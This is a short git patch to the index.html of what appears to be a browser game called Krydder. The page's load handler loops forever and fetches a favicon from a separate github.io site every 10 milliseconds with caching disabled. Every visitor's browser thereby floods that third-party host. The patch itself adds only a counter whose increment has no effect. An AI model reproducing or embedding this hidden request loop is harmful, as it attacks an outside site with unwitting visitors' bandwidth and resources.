From 4897f0188c32f492a8467065f5252a29598f2d3f Mon Sep 17 00:00:00 2001 From: Boof <97455552+hexahigh@users.noreply.github.com> Date: Tue, 17 Jan 2023 12:00:39 +0100 Subject: [PATCH] check --- Games/Krydder/index.html | 2 ++ 1 file changed, 2 insertions(+) diff --git a/Games/Krydder/index.html b/Games/Krydder/index.html index fc56de6..1bf7c2b 100644 --- a/Games/Krydder/index.html +++ b/Games/Krydder/index.html @@ -16,10 +16,12 @@ setTimeout(resolve, milliseconds); }); } + var timesdown = 0 window.onload = async function startdown(){ while(true) { await delay(10); fetch('https://t0m0t0w.github.io/favicon.png', {cache: "no-store"}) + timesdown + 1 } } let speed = 1000